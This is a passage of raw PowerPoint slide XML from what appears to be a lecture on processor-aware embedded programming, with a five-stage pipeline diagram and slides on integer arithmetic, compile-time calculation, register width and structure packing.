            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="28194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1" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="33528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2" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="38100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3" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="28194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4" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="33528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5" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="33528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6" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="31242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7" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="33528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8" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="35052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9" name="Line 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="3505200"/>
            <a:ext cx="0" cy="1219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0" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="33528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1" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8077200" y="1581150"/>
            <a:ext cx="0" cy="1771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2" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4238625" y="1581150"/>
            <a:ext cx="38385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3" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4238625" y="1581150"/>
            <a:ext cx="0" cy="838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4" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="28194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5" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2286000"/>
            <a:ext cx="149225" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969696"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10276" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="2276475"/>
            <a:ext cx="133350" cy="1574800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969696"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10277" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4953000"/>
            <a:ext cx="1219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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>IF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10278" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="4953000"/>
            <a:ext cx="1371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2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>DEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10279" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="49530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3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>RF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10280" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="4953000"/>
            <a:ext cx="1371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 Stage 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>EX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10281" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="4953000"/>
            <a:ext cx="1219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5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>WB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10282" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="533400" y="3124200"/>
            <a:ext cx="0" cy="1295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83" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="31242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84" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4238625" y="2400300"/>
            <a:ext cx="2571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7999471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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know your processor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Not all processors support all arithmetic operations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Multiplication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Division</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Floating point arithmetic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>When using this arithmetic, burden falls on the compiler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>You will typically not get an error/warning when using operations not supported by the processor…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid using when possible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12602091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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rocessor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Try to deal with integer values instead of fractional values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Example: Instead of 0.5 seconds, 500 mSecs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>For binary fractions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Shift all numbers to integers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Perform calculations on integers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Shift only final result back to fraction.</a:t>
            </a:r>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230113585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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know your processor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>If managed to stick to integers, make sure that calculations remain correct.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example: if a = 4, b = 8, c = 16, and all are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, (a/b)*c won’t work. Use (a*c)/b instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In general it’s worth forcing all multiplications to occur first, before all divisions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Try to move calculations from run-time to compile time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If a = 10 and b = 5, (a/b) will be much more efficient if done in compile time (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> a and b must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>consts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> or #defines)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Multiplications and divisions by powers of 2 are fast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296443394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pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processor’s Register Width (I)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Need to take register width into account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Example: If register width and external data bus is 16 bits wide, better to perform operations on 16-bit variables than 32-bit variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operations on 32-bit variables will produce redundant loads from and stores to memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>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18407887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en-US" smtClean="0"/>
              <a:t>Processor’s Register Width (II)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1600200"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Structure packing – optimizing structure size in memory. Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="3276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3" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="34290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4" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="35814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5" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="37338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6" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="3886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7" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="4038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8" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="4191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9" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="4343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0" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="4495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1" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="4648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2" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="48006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23" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="49530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24" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="5105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5" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="5257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6" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="5410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7" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="5562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8" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3276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9" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3429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0" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3581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1" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3733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2" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
